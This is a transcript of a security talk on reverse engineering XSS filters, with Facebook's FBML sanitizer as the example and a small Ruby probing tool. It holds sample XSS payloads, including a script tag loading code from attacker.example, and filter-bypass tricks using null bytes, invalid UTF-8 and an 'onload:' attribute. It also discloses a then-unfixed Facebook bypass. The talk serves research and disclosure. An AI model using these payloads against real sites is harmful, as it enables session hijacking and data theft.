This presentation is about web security and cross-site scripting. I realize these topics are usually considered kind of lame, but I'm approaching them from a reverse engineering perspective, and I find the combination of hardcore reverse engineering and the very vague area of cross-site scripting to be pretty interesting. Hopefully by the end of the talk you'll agree with me. We know that while the future might not have the flying cars we were promised, it will have web applications, and web applications will be a very major part of computing. Virtually everybody here has used web applications, will use them more and more, and will come to depend on them. So web applications are the future of computing, or at least a very major part of it.

Where does this put reverse engineers? Well, reverse engineering is about the mindset, so you can apply it to any type of application. Web applications are a little bit different, but if you approach them as a target that you need to understand and master, you can get pretty far. The main differences are that web applications are usually hosted somewhere else, commercially, and you have access neither to the source code nor to the binaries, so you cannot use the standard disassembler or debugger techniques. The main technique you can use is black-box reversing, which basically means sending data, looking at the output, and trying to figure out the internals of the application from that. I find that particularly interesting because it's quite different from the traditional reverse engineering approach. The environment is very different, the tools are very different, and the things you're looking for are very different, but it's the mindset that really matters; you can learn the new environment and the new tools easily enough.

In particular, I'm going to talk about cross-site scripting, which is so prevalent, and such an easy and common mistake for web application developers to make, that I think of it as the strcpy of the web application world. In the first part of the talk I'll give a brief introduction to cross-site scripting for those of you who are not familiar with all the details. To prevent cross-site scripting, developers usually rely on cross-site scripting filters, which is what we're going to be reversing, and I will demonstrate some techniques I have for reverse engineering these filters. So this is how the presentation will proceed. First, I'll present the problem and give a few examples of why cross-site scripting is a really big deal and why it's getting more and more important because of developments that are happening in web applications right now, particularly user-generated content and the very loosely defined Web 2.0 thing. Then I'm going to talk about how developers implement cross-site scripting filters, what the different approaches are, and what their advantages and disadvantages are. It's important to understand the implementation of the thing you're going to be reversing before you start, so that your guesses are more educated. Then I'm going to present some approaches for reversing these cross-site scripting filters, and I'm going to show you a little tool that I wrote to automate some of the steps.
And finally, I will demonstrate a few cross-site scripting bugs in Facebook, and I will show how I used my tool against Facebook to reverse engineer their filter and get some pretty interesting results.

So let's start. You've all heard about the Web 2.0 thing. I've heard many different definitions, but the parts that are particularly relevant to this talk are user-generated content, which is any content that comes not from the creators of the site but from its users, and third-party services. Part of this is also mashups and RSS readers. If you have a web application that works as an RSS reader, it's going to be pulling content from various untrusted sources and displaying it. You also have mashups like the one that combined Craigslist and Google Maps and showed available apartments for rent on a map. Perhaps the developer of that mashup can trust the stuff coming from Google Maps, but can they really trust the data coming from Craigslist? Perhaps there is a way to inject some code into the mashup application through it. Because of the Web 2.0 development we now have architectures that are very distributed, with a lot of services that depend on other services they do not control and very often do not understand. By that I mean the developers might understand how to use the data coming from Craigslist, but the specific format of the data, exactly what kind of data is allowed and what kind of characters are filtered, is not precisely defined, and it might change over the lifetime of the application, because Craigslist might change their format or their implementation.

I was talking to Dino before the talk about this, and he made a very good analogy to bring it back to stuff we're perhaps more familiar with: taint analysis, the taint propagation idea. When you look at traditional binary applications and untrusted data, you try to model the flow of that data and see where it's being used. In web applications it's pretty hard to trace that flow, because pretty much all of the data is untrusted and it comes from various services which might be pulling it from other services. Because of the distributed nature, it's very hard to model the entire system; you're only looking at one little front-end piece and you don't know exactly where all the tainted data might be coming from. The data also goes through a lot of transformations, different formats, translations and encodings, so there are a lot of problems there. The main point is that because of this aggregation and the distributed nature of these applications, you have a significantly increased attack surface compared to a traditional website that contains nothing but static HTML that you throw up on GeoCities, where there is no real risk. These new architectures are a lot more interesting to break.

So let's look at user-generated content. This can take a lot of forms. It can be plain text, which is what a lot of the forms you fill out on the internet and many forums accept. It can be some kind of lightweight markup, which some services use; this can be something like BBCode, a markup language used in some forums, and Wikipedia also has its own markup language.
Some services try to use HTML for this, because their users might be more familiar with it; blogs, for example, allow you to use some HTML tags in a blog comment. And finally, there are services that attempt to give their users almost the full power of HTML, even JavaScript. If you look at the order of these bullets, filtering the bad stuff out of user-generated content gets increasingly harder as you go down the list. Filtering plain text is fairly easy. Filtering content when you're allowing users to use all HTML tags and even JavaScript is, I wouldn't say impossible, but very, very hard; there are a lot of subtleties. You also have images, sound, video, even Flash, and these have their own problems. Most of the problems with images and sound files are file format vulnerabilities, which can be used to exploit the browser or client that is looking at them. I'm not going to talk about those in this presentation; I'm going to focus on cross-site scripting, and specifically on text-based cross-site scripting. There are some interesting things you can do with cross-site scripting in Flash, but I'll leave them for another talk.

Sometimes user-generated content turns into attacker-generated content, and I have some examples here. We have Samy's MySpace worm, which you're probably familiar with; it hit a million people on MySpace. We've had some Orkut worms, including some that were stealing banking information from users. There have been attacks against webmail applications, which are a pretty juicy target. Skyline actually wrote a cross-site scripting worm that had the ability to propagate between Hotmail and Yahoo Mail back in 2002. I think that was the stone age of cross-site scripting, before people really realized the full potential of these bugs. We've also had bugs in SquirrelMail, and there have been WordPress hacks through cross-site scripting. All of these services are things that a lot of people use, probably a lot of you, and nobody likes to be hacked. So the threat is there.

Let's look at what exactly cross-site scripting is. This is a very simple case, and if you already know all of this, please bear with me; the section after this will get a little more interesting. We have a little web app which takes the name of the user and prints hello followed by the user name. If, as a parameter to that app, you give the script tag shown in red, and the application doesn't do any filtering, it will just output the same script tag into the HTML code, and when the browser displays that HTML, it will execute the script inside the script tag. Why is this bad? It's bad because of the web security model, which was designed long before the current push towards web services, web applications and user-generated content. The web security model assumes that everything that comes from a specific site is safe, because it's controlled by the person who wrote the HTML in Notepad. But things don't work like that anymore; now we're combining different types of content on the same web page. The same-origin policy, which is the main part of the web security model, says that a script loaded from a page in one domain does not have access to pages loaded from other domains.
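As a concrete illustration of the hello-name example above, here is a minimal sketch of what such a vulnerable handler might look like, written with Ruby's standard CGI library; the parameter name and page layout are hypothetical, not taken from the talk.

    require "cgi"

    cgi  = CGI.new
    name = cgi["name"]   # attacker-controlled query parameter

    # No escaping: whatever the user supplied is copied straight into the page.
    cgi.out("text/html") do
      "<html><body>Hello, #{name}</body></html>"
    end

    # Requesting ?name=<script>alert(document.cookie)</script> makes the browser
    # run the injected script in the application's own origin.
    # The one-line fix in this sketch would be CGI.escapeHTML(name).

Because the injected markup is served from the application's own domain, the same-origin policy treats it as fully trusted, which is exactly what the next example shows.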
The classic example is that you're logged into your bank and you also visit some other site, say Slashdot; the JavaScript code on Slashdot does not have access to anything on the bank site, even though it's in the same browser. Cross-site scripting allows you to execute external scripts on a page served from a domain that is not under the attacker's control, so cross-site scripting allows you to subvert the same-origin policy. In the previous example we had a script the attacker controls executing on the page of the web application, and this could be a web banking application or something else that's important. So what can cross-site scripting do? Once you can execute JavaScript on a page, you can steal all the data from the page, you can capture all the keystrokes, you can capture all the data typed into forms, you can steal authentication cookies, and, the most powerful attack, you can make arbitrary HTTP requests against the same domain. The data coming back from those requests is available to the JavaScript, so the JavaScript can fully impersonate the user who's using the browser. There is no way for the web application to distinguish between actions taken by the real user and actions taken by the JavaScript that has been injected into their browser.

So if cross-site scripting is so bad, what can web developers do to prevent it? The obvious thing is to just remove all the script tags from the content that you're taking from users. However, there are a lot of challenges there. First of all, there are a lot of different HTML features that allow scripting; it's not just script tags, there are many other things, and I have another slide with some examples. There are also proprietary extensions to HTML, so if you read the HTML standard and do everything according to the standard, that's not going to be enough for Internet Explorer, and I think Firefox might have some proprietary extensions too. There is also the problem of invalid HTML. Browser parsers are notoriously forgiving of malformed HTML and will fix it up for you, so if your filter looks at something and decides it's malformed and therefore not a script tag, the browser might still interpret it as a script tag. And finally you have browser bugs, not necessarily browser vulnerabilities, just bugs in the parsers, which the person writing the filter needs to be aware of.

Here are a few examples of different ways you can inject scripts into websites. You can use a script tag with a source attribute. You can use a script tag with JavaScript embedded inside the tag. You can use event handler attributes like onload, and the JavaScript contained in the attribute will be executed. You can also use style sheets; there are a couple of different ways for style sheets to execute JavaScript, and this is just one of them. And finally, you can use URLs. You used to be able to put a javascript: URL in an image source; I think Firefox and IE fixed that so you can no longer do it with images, but you can still do it with other types of elements. All of these are features that you need to take care of in your filter; you need to be aware of their existence. And these are the simple ones, because they're standard, and anybody who knows HTML would probably be familiar with them. But there are a lot of other, weirder ones.
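To make that list concrete, here are the standard vectors as literal payloads, collected in a small Ruby array; the URLs and alert calls are placeholders, and any one of these will execute script if a filter passes it through unmodified.

    # The standard, well-documented ways to get script execution,
    # roughly in the order listed above. URLs and payloads are placeholders.
    STANDARD_VECTORS = [
      '<script src="http://attacker.example/evil.js"></script>',   # external script
      '<script>alert(document.cookie)</script>',                   # inline script
      '<body onload="alert(1)">',                                  # event handler attribute
      '<div style="background:url(javascript:alert(1))">',         # script via a style attribute (older browsers)
      '<iframe src="javascript:alert(1)"></iframe>',               # javascript: URL in an element that still allows it
    ]

These are only the documented features; the weirder, browser-specific behaviors are where it gets ugly.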
For example, IE supports these things called XML data islands, which basically allow you to put a reference to an XML file, or even embed the XML inside the web page, and then refer to that XML from a different element, like a span element. In that case you don't have any script tags on the actual website, but any scripts in that XML file will be executed as if they were on the same page. Netscape 4 had an extension that allowed you to put JavaScript in any attribute; this was removed in Firefox, so it's no longer there. But you also have conditional comments. If you write an XSS filter that assumes all comments are safe and just lets them through, an attacker can use this code to cross-site script you. This is a conditional comment, which Internet Explorer interprets, and it says: if this page is being displayed in an Internet Explorer browser with a version greater than or equal to four, then interpret the contents of the comment as HTML.

Even if you handle all the proprietary extensions, you still have problems with the browser parsers, and this is one very funny example. It shows five different ways you can bypass filters if they don't parse the HTML the same way the browser does. Here we have an extra less-than sign before the opening tag. We have a null byte inside the tag name; this one is interesting, because in Internet Explorer you can put null bytes anywhere in the HTML, as many as you want, and they get completely ignored, so you can use them to break up the name of a tag. You can also use a forward slash as a separator between the tag name and an attribute instead of whitespace. You don't need quotes around the attribute value. You don't need a greater-than sign when you close the tag. Your XSS filter needs to be aware of all these things; it needs to duplicate the behavior of the browser, but the behavior of browsers when dealing with malformed HTML is not documented anywhere, and it differs not only between different browsers but also between different versions of the same browser. So, for example, Internet Explorer will interpret this as the script tag shown below, but Firefox will not, I think because of the null byte; if you remove the null byte, it will work in Firefox too.

And finally, you have things that are just bugs in the browsers, and here are two examples. You should pay attention to these, because both of them will come up in a later slide. The first bug I'm going to talk about is invalid UTF-8 handling. In UTF-8, unlike ASCII, you have multi-byte characters, and the first byte of a multi-byte character determines how many bytes constitute the character. The C0 byte that I have there in the HTML says this is a two-byte character, but because of the particulars of the UTF-8 encoding, C0 is not actually a valid first byte. So when Firefox and IE7 interpret this HTML, they reach the C0 byte, see that it's an invalid character, and replace it with a question mark. Basically, if you do view source in Firefox on this HTML, you'll see a question mark where that character used to be. They replace the first byte with a question mark and then continue, so they will interpret this element as having two attributes, foo and bar, as shown on the slide.
IE6, however, will parse this as a two-byte character: it sees that the C0 byte claims two bytes, so it skips over the second byte, and both the C0 byte and the quote that follows it get replaced with a question mark. This allows you to eat the closing quote of the attribute. So if you can inject a C0 byte inside an attribute value, that C0 byte will eat the next quote, and Internet Explorer 6 will interpret this element as having two attributes, the second of which is an onload attribute, which allows you to execute JavaScript. If you're writing an XSS filter, you need to decide how you're going to handle invalid UTF-8 sequences: do you handle them like Firefox does, or like IE6 does? Either choice has the potential of breaking the other browser, so you need to make sure you remove the invalid UTF-8 sequences before you even start parsing. A lot of web developers just don't know this issue exists, and if you're not aware of it, you're probably going to write an XSS filter that simply lets C0 bytes through, and then you'll be vulnerable to this bug.

There is another interesting case, in Firefox versions before 2.0.0.2. The parser had a bug where it treated a number of weird characters as whitespace when parsing attributes. So if you have this HTML, with an onload attribute followed by all these characters, Firefox will see an onload attribute followed by a bunch of whitespace, then the equals sign, then the JavaScript code. If you're writing an XSS filter that wants to remove onload attributes, and your regular expression for finding attribute names allows anything that's not a space, then you might treat some of these characters as part of the attribute name; the attribute name will then not match onload, so you won't remove it, you'll let it through, and Firefox will execute the script.

So writing cross-site scripting filters is pretty hard; you have to be aware of all these things. There are some good filters out there, but there are also a lot of cross-site scripting filters that are not good at all. I hope I didn't bore you too much with this section; we'll get to the reversing part in a little bit. One important thing when you're reversing something is to understand how it's actually designed and written. You need to know how you would write this type of program, so that you can understand what the developer was thinking when they wrote it. This is why I'm going to show you the different ways you can write XSS filters. The first way, which used to be pretty common but is not very good at all, is to just use regular expressions to remove bad stuff from the HTML. This regular expression removes the script tag. There are countless ways to bypass these types of filters, and the most fun one, the third bullet there, is to use the filter against itself. If you have a script tag nested inside another one, and the filter runs only once, it will remove the inner script string, and the two parts around it will come together and form a real script tag, which then gets sent to the browser.
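Here is a minimal Ruby sketch of that kind of regex filter and the nested-tag bypass; the filter shown is deliberately naive and is not any particular site's code.

    # A naive blacklist filter: strip the literal opening tag "<script>".
    def naive_filter(html)
      html.gsub(/<script>/i, "")
    end

    payload = "<scr<script>ipt>alert(1)</script>"
    puts naive_filter(payload)
    # => <script>alert(1)</script>
    # Removing the inner "<script>" splices the surrounding halves back
    # together, so the filter's own output contains exactly the tag it
    # was trying to remove.

Running the filter repeatedly until the input stops changing helps with this particular trick, but it does nothing about the encoding and malformed-HTML problems that come next.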
There are also a lot of problems with invalid HTML and different encoding issues; attribute values can be encoded in many different ways, so your regular expressions very quickly get very, very complicated. I'm not really going to talk about reversing these types of filters, just because they're too trivial. Here is a better way to do cross-site scripting filters, and most of the good sites use this approach: you take the HTML and you actually parse it, building an in-memory representation of the HTML tree. For example, when we parse this, the filter will build this tree representation, with a body tag that has an onload attribute whose value is the alert string, and then a script tag and a p tag. This allows you to very clearly distinguish what is a tag, what is an attribute name, and what is a value. The main benefit of this approach is that you can do canonicalization, which means you parse the input, build the in-memory representation, and then apply your XSS filters on the tree. If the XSS filter says remove all onload attributes, you don't need regular expressions to find the attributes, because your parser has already extracted all of them into the tree representation; you can just walk the tree and remove the things you don't like. Then you output the tree, writing it out based on the in-memory representation. This solves the Firefox problem to an extent, because it removes all the weird whitespace, all attributes are output in a canonical form (attribute name, equals sign, quote, then the attribute value), and the canonicalization also makes sure to escape all the special characters properly and close any tags that are not closed. By being very careful about how you do the output, you can ensure that the browser, when parsing that output, will interpret it in the exact same way your filter interpreted it, and this is a much safer way to do cross-site scripting filtering.

The final point I'm going to make about the different implementations is about whitelisting versus blacklisting. Most people do blacklisting at first, and then they discover there is some other HTML thing they didn't think of and they need to add it to the blacklist. They add it, then another one comes up, and then the next version of some browser comes out and supports some element called, you know, fooscript, which allows scripting as well, and if that element was not on your blacklist, you're vulnerable again. A much safer way is to use whitelisting, where you only allow the elements and attributes that you know are safe. If you do a good job of this, the filter will be very solid, unless some browser comes out and changes the meaning of some attribute. This actually happened with style sheets. Initially CSS did not have support for executing JavaScript, so it was safe to allow style attributes in your HTML. But then browsers added support for JavaScript in CSS, so now this was another thing you had to filter. And CSS filtering is tricky too: perhaps you don't want to remove all the style sheets, only the ones that contain JavaScript.
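As a rough sketch of this tree-based, whitelist approach, here is what it might look like in Ruby using the Nokogiri HTML parser; the whitelists are illustrative and far from complete, and a production filter would need to handle many more cases.

    require "nokogiri"   # gem install nokogiri

    ALLOWED_TAGS  = %w[p b i a ul ol li]   # illustrative whitelist, not complete
    ALLOWED_ATTRS = %w[href title]

    def sanitize(html)
      # Build the in-memory tree first, then filter it, then re-serialize.
      fragment = Nokogiri::HTML::DocumentFragment.parse(html)
      fragment.traverse do |node|
        next unless node.element?
        if ALLOWED_TAGS.include?(node.name)
          # Drop every attribute that is not explicitly whitelisted.
          node.attribute_nodes.each do |attr|
            node.remove_attribute(attr.name) unless ALLOWED_ATTRS.include?(attr.name)
          end
        else
          node.remove   # unknown element: remove it and everything inside it
        end
      end
      fragment.to_html  # canonical output: quoted attributes, closed tags, escaped text
    end

    puts sanitize('<p onclick="alert(1)">hi<script>alert(2)</script></p>')
    # => <p>hi</p>

Because the output is re-serialized from the tree, the browser only ever sees canonical markup; the weird whitespace, unquoted values and unclosed tags from the earlier examples never reach it.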
So now, in addition to your HTML parser, you have to write a CSS parser, and CSS parsers have the exact same problems I presented earlier: you have browser incompatibilities, and browsers accept invalid, malformed CSS and fix it up, so it's the same thing all over again. The proper approach to filtering CSS is again to build a tree, filter it, and output it in canonicalized form. I'm not going to talk about CSS in this talk; I just wanted to make the point that sometimes, even if you think you have everything covered, the browser vendors will come up with something new that you have to add.

Now that we understand how cross-site scripting filters are developed, we need to look at how to reverse them. Reversing cross-site scripting filters is kind of different, because for most interesting web apps you don't actually have the source code, and you don't have the binaries; the web app is running somewhere in the cloud and you don't even know where it is. One thing you could do against these kinds of apps is fuzz them, but fuzzing remote web apps is limited by how much bandwidth you have, and by the latency. Also, if you start sending gigabytes and gigabytes of data to a web app, maybe they'll notice, and they'll shut you down or ban you. We're presuming they don't want you to reverse this; if they did, they'd probably just give you the binaries. So if we cannot do full-scale fuzzing with a lot of randomness, we need to do something smarter, and what we can do is the black-box reversing approach: you craft some kind of input, some HTML that's perhaps malformed in different ways, you send it to the cross-site scripting filter, and you look at the output to see how the filter modified your input. Based on the different modifications, you start to figure out how the filter actually operates. For example, one good way to determine whether the filter uses stream parsing, which is similar to the string-matching filters, or builds an in-memory tree representation, is to look for cases where the filter changes some tag based on the contents of the tag or on other tags that occur later in the stream. If you find a case like this, it means the filter must have a full tree, or a more or less complete tree, somewhere in memory to walk; it cannot be looking only at the characters that came before the current point, so it is not a stream filter.

I think this is probably the most important slide in the presentation; this is the main point I wanted to make. The approach I've taken to reversing these cross-site scripting filters is based on the following algorithm. First, you guess how the filter might work; you just make a very basic, educated guess. Then you start generating test cases and you inspect the results. Based on those results, you update your model. If you notice that some elements are not allowed, then perhaps this is a blacklisting filter, so you update your mental model of the filter to include code that removes elements on a blacklist. You can send test cases to see whether it's a blacklisting or a whitelisting filter, as in the sketch below.
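The probe itself can be as small as this Ruby sketch; send_testcase is a hypothetical stand-in here, since the real request logic depends entirely on the target application.

    # Hypothetical stand-in: a real implementation would submit `html` to the
    # remote filter over HTTP and return the filtered page content.
    def send_testcase(html)
      html
    end

    probes = [
      "<b>bold</b>",      # known, harmless element
      "<foo>text</foo>",  # made-up element that no whitelist would contain
    ]

    probes.each do |markup|
      puts "sent #{markup.inspect}, got back #{send_testcase(markup).inspect}"
    end
    # A filter that passes the made-up <foo> element intact is not using a whitelist.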
If you put an element called foo, which is not a valid HTML element, and that element goes through, then the filter is most likely a blacklisting filter, because a whitelisting filter would only allow known elements, and foo is not a known element. So you use this iterative approach to update the model as you learn more from your test cases. The model can be a mental model, just in your head; it could be a text file where you write some notes; it could actually be pseudo-code; you could even implement the model in real code if you want to be really thorough. One interesting thing is that if you implement the model, you'll have a local duplicate of the filter, and then, to confirm that your local implementation is the same as the remote one, you can do some fuzzing where you send random input to both filters and make sure their outputs match.

Let me give you a little example of exactly what kind of test case you would send and what you would learn from it. This is some Ruby code that goes through all byte values from 1 to 255. It iterates through these bytes and mutates a piece of HTML: the part shown in red, the X, is replaced with each value of the byte. So we're going to have a lot of p elements that have this attribute a, and right before the attribute a there will be the current byte. This lets you test the behavior of the parser and find out what the parser considers whitespace between a tag name and an attribute name, and what it considers a valid attribute name character. To give you a real example, I have some output here; I hope you can see it, I tried to make the font big enough. What we have here is all of the bytes from 1 to 255: first the number of the byte, then the output from the filter, and this is actually the Facebook filter, so we're going to learn how the Facebook parser parses attributes. You can see that a lot of these bytes result in the attribute being completely removed, and this is because the parser treats them as invalid: they're neither whitespace nor part of the attribute name, so it's some kind of broken HTML and the parser just ignores the attribute that follows. Some bytes, like the tab character, the vertical tab, and the newline characters down here, are treated as whitespace by the parser, and you see that we get an a attribute in the output. Another interesting thing is that the character between the p tag and the attribute name in the output is always a space, and this tells us that the Facebook filter is using canonicalization: it builds an in-memory representation and then outputs it, always emitting a single space between tag names and attributes, so we don't see the newline characters or the vertical tab there. As we go through this, here's another whitespace character, the space itself. Also, for some reason, 22, the double quote, as well as the single quote and the forward slash, are counted as whitespace in this particular place in the parser.
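The slide code is not reproduced here verbatim, but based on the description it was roughly along these lines; treat this as an approximate reconstruction rather than the actual tool.

    # For every byte value from 1 to 255, emit a p element with that byte
    # placed between the tag name and an attribute named "a".
    (1..255).each do |byte|
      testcase = "<p" + byte.chr + "a=\"1\">x</p>"
      puts "#{byte}: #{testcase.inspect}"
      # In the real tool each test case is sent through the remote filter and
      # the returned output is recorded next to the input for comparison.
    end

Comparing each byte's input with what the filter sends back is what produces the attribute-parsing results being walked through here.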
If we scroll down, we can also see some characters that are treated as part of the attribute name. These are 0 through 9, and also the colon character, which I believe is because of XML namespaces; the format there is the namespace name, a colon, and then the attribute name. The interesting part is that Facebook does not actually validate that you have a namespace name followed by a colon, so you can have the colon as the first character of the attribute name. Remember this, because it will come up later. So from this single test case we learned which characters are treated as whitespace and which characters are valid in attribute names.

To do this on a larger scale, I wrote a little tool called refilter. The slide says it's a framework, but it's not really; I wrote it specifically for Facebook, although it could be extended to handle other sites as well. It has sort of a modular architecture, although it's a pretty small script, so architecture is perhaps a big word for it. It has modules that are supposed to abstract the application-specific functionality: there is a generic send-test-case method and a get-results method, and you can build different modules for different web apps that implement the specifics of exactly how you send the test case, where you put it in the HTTP request, and what the URLs for the request are. I also have modules that implement different tests, and the previous example was actually taken from one of them; these modules contain a bunch of test generator functions that just generate the data we're going to send as the test case. The nice thing about refilter is that it gives you the ability to replicate your results at any point, because all of your test generators are in the code and you can run them repeatedly and automatically; I've done this manually as well, with just a browser. The output from the test cases is stored on disk in a results directory. A nice thing about this is that you can run all the tests, get the results, and then, if you find a bug, do what I actually did: I found a bug, I reported it to Facebook, they fixed it, and after they fixed it I ran my tests again. It was a single command; I told refilter to run all tests, and then I had two results directories and I just diffed them to see what had changed in the Facebook filters. I found the changes they had made to fix the vulnerability I reported, and then it took me about an hour to break it again, because their patch wasn't complete; there was another place where you could do the same thing that they did not fix. But, you know, that's how it always is.

So what do you do when you have the model of the filter? This is the more academic part. Once you have the model, you can build a grammar out of it. This is pure speculation, I have not actually done it except informally in my head, but you could build a formal grammar for the output that the filter produces, all the possible variations. Once you have that grammar, you can do the same for the browser and build a grammar of all the HTML that can do scripting that the browser accepts.
You can do this either by reading the source code of the browser, or by reversing it, or with some kind of fuzzing, or you can apply the same iterative model-generation approach that I presented to figure out all the different things the browser accepts. Perhaps you could even automate the generation of the grammar, in some kind of BNF form, from a black-box parser; this is an interesting research topic, and it would be a pretty useful tool to have. Once you have the two grammars, you need to find a valid sentence in both of them that contains a script tag, and if you do, you have a cross-site scripting vulnerability. Of course, you can look for all the other ways to run scripts as well. This step can perhaps be automated too; it would make a pretty nice research project for some kid in school, so if there are any students here who are interested in working on this, let me know. If you're not the academic type and you like quick results, you can actually implement the model and then fuzz it. Because the implemented filter will be running locally, you can fuzz it very quickly; you can throw billions of random test cases at it and perhaps find some way to bypass the filter.

So let me give you a real example of how this works, and I'm also going to show you the refilter script. But before we get to that, let's talk about Facebook. Facebook was the first target I picked when I decided to play with this. Facebook is a social networking platform: you get a profile there, you can send messages to your friends, you can post stupid pictures. One interesting thing about Facebook, and I think they were probably the first social network to do this, is that they tried to turn their site into a platform for application development, so you can build third-party applications that integrate with Facebook. What these applications can do is the following. They can build their own application pages, which are hosted in the apps.facebook.com domain; each application has its own page there, and these pages can show whatever content the application needs to show. One of the apps that I use on Facebook is the chess app, which lets you play chess against other people on Facebook, and its application page just shows you a chess board and all your current games. In addition to the application pages, which are sort of separate from the main Facebook site and not completely integrated, applications can put content in user profiles. If you've ever seen a Facebook profile, you've probably seen a bunch of stupid boxes in it, for the vampires-versus-zombies game, or a little map with pins showing the places that person has traveled around the world. Most of the apps are pretty stupid, but that doesn't make the platform any less interesting for our reversing. So applications have the ability to add content to user profiles, and if you wanted to do a worm, finding a cross-site scripting bug in that functionality would probably be the way to go, because then everybody who looks at the profile gets infected.
Another way of propagating these things would be through message and wall post attachments. Facebook allows you to attach almost arbitrary HTML to messages that you send to other Facebook users, and again they rely on their cross-site scripting filter to ensure that these attachments don't contain anything bad. The way they do this is by defining something called FBML, which is a subset of HTML; it's almost a complete subset, actually, they support almost all the tags. Application developers write their pages, and the content they want to display to users, in this FBML markup. It looks almost exactly like HTML, and it has some custom tags. For example, there is a custom tag that stands for the name of the currently logged-in user, the user who's looking at your app; if you put that tag there, Facebook will automatically replace it with the name of the user who's looking at the page, so it allows you to do some kind of dynamic programming. It has style sheet support, and it also has support for scripting, which is kind of neat: you can actually run JavaScript inside FBML, and they have a pretty ingenious way to sandbox that JavaScript, which is actually quite clever. I'm not going to go into it right now because the end of the talk is coming up, but if you want to find out more about the JavaScript sandboxing, ask me after the talk. So Facebook is one example of a site that allows almost unrestricted HTML and JavaScript, and their cross-site scripting filter needs to be very, very good to block everything. I wanted to find out how good it is.

This is the typical architecture for a Facebook app. You have the browser, and the browser requests an application page from the apps.facebook.com domain. Then apps.facebook.com acts as a proxy and requests that page from the site of the developer, for example funapp.example.com. The third-party site does whatever it needs to do; for example, the chess application reads its database and shows you the current chess board, and it does this using FBML, returning the FBML content to apps.facebook.com. Facebook then ensures that the FBML is well formed and does not contain any bad stuff, does its XSS filtering, and sends the result back to the browser. So if there is any way to bypass the cross-site scripting filter there, the third-party application can exploit the browser of the user who's using it. I used the refilter script for this: my script writes the test cases to a file in a directory shared with Apache, and I have that IP address configured as a Facebook application. Then refilter makes a client request to Facebook to fetch that application page. So the machine where refilter is running acts both as the server for the FBML and as the client that reads the resulting HTML; this is how you can do the full cycle, send the test case and then read the result. What I found out through the testing is that Facebook does use a DOM parser: it builds an in-memory representation of the parsing tree, it fixes invalid input, it canonicalizes everything it outputs, and it uses a whitelist for tags, so it only allows tags that are known to be safe, but a blacklist for attributes. So if you can find some way to confuse the parser and produce an attribute that the XSS filter allows but that the browser will interpret as some kind of scripting attribute, then you have a cross-site scripting vulnerability. So let me show you the refilter script.
Just a few quick examples; I have only two more slides, so I'll be done shortly. This is the main script; sorry if you can't read it very well in the back. The script basically consists of a loop that goes through all of the tests, prints "running test", and then calls into the Facebook module: I create a new instance of it, send the test data, read the result, check for Facebook errors, and then sleep for a second so as not to hammer their servers, and it just iterates through that repeatedly. The code is not really interesting at all. Here's what the Facebook-specific module looks like: it has functions for sending the HTTP request, reading the response, and parsing it to extract the actual data you're interested in. Again, not very interesting code, but this is probably more entertaining: this is the test module that contains the test generation functions, and here's the one I showed earlier on the slides; it just iterates through all the bytes from 1 to 255, prints them out, and sends that as the data. I have a lot more tests, and I'm releasing this, so you can look at it later in the release; they just test various aspects of the parser, and based on the results you can figure out what the parser did. The results are stored in this results directory, and here you have the names of all the test cases, in unreadable blue. We have "HTML tag open", which is one of the test cases, and we have the input, which is what we're sending to Facebook; you can see that we're iterating through a number of characters to see how they affect the parsing. Then we have the output, which is what Facebook returned, and based on this we can figure out how the parser works. We also have an error page, which contains errors that the Facebook parser displays; these are interesting for gaining some understanding of the parser, but they're not really required, you can do this with just the input and the output.

Remember the two browser bugs I talked about earlier, the invalid UTF-8 sequences and the Firefox attribute name bug? These are the two bugs I'm going to show. Facebook was vulnerable to the UTF-8 bug because its parser seems to treat everything internally as ASCII, just byte streams, but they were serving the output with the content encoding set to UTF-8. So you could inject a C0 byte inside an image tag, Facebook would just output it, and then Internet Explorer 6 would parse this as a tag with an onload attribute and execute the JavaScript. I reported this to Facebook in February and they fixed it, but the first time they fixed it, they did proper UTF-8 parsing only inside attribute values, because that was the example I gave them. After they told me it was fixed, I did some more testing and found that you could do the same thing with invalid UTF-8 sequences inside normal text, outside of an attribute. So I told them to fix it again, and it took them about a month to finally fix that, which is still much, much faster than the typical response time you get from somebody like Microsoft.
So perhaps web services do have some advantage, although I think it should be faster than a month; but that's how long it took. And this is the more fun one: it's still not fixed, and I'm actually publicly disclosing it right here for the first time. It doesn't really affect any real users, because it only affects Firefox versions before 2.0.0.2, so you're probably not going to see a worm based on this or anything more interesting, but it's a good example of a Facebook bug. When I described the Facebook parser for attribute names, I made a point of the colon being a valid attribute name character. So when the Facebook filter parses this HTML, it sees an attribute named "onload:". Because they use blacklisting for attributes, and only "onload" is on the blacklist, "onload:" does not match anything on the list, so they let the attribute through and print it out. When the Firefox browser parses this, it sees it as an onload attribute and executes the JavaScript inside it.

So let's get to the fun part. Let's see if I can make the font a little bit better. Yeah. So this is Facebook, and this is an application that I wrote called Zuckerbug; it's at apps.facebook.com/zuckerbug, and it has a little table with all the bugs I found, all three of them, along with test cases. The first two are fixed, so we're not going to look at them, but the third one is the one I just described. When I click on test, we get a JavaScript alert telling us that we have XSS and the domain is facebook.com. I didn't have enough time to make it do anything more flashy, but once you can execute JavaScript on Facebook, you can do whatever you want. If you want to look at the source for this, this is the Facebook page and our content is right here; sorry, it's really hard to work with because I can only see it on that screen. We have an image tag that loads this image, and then we have an onload:= attribute that evaluates this JavaScript statement, and that's what shows the alert.

So, in conclusion, there are a lot of problems with Web 2.0 sites and the general architecture there. The first reason for these problems is the web security model, which was designed with the assumption that sites only contain safe content that was put there by the creator of the site. It did not anticipate third-party data, dynamic data, or user-contributed content. There is no way to combine data with different trust levels on the same page. There are some proposals for adding this in a future version of HTML, but at this point, if you combine two types of data on the same page, they have full access to each other and also full access to everything else in the same domain. There is no way to sandbox HTML content, and that's why we have to do this kind of XSS filtering, which, as we saw, sometimes fails. Another problem is that you cannot really talk about the security of a website in isolation, because it depends on the interaction between the website and the client.
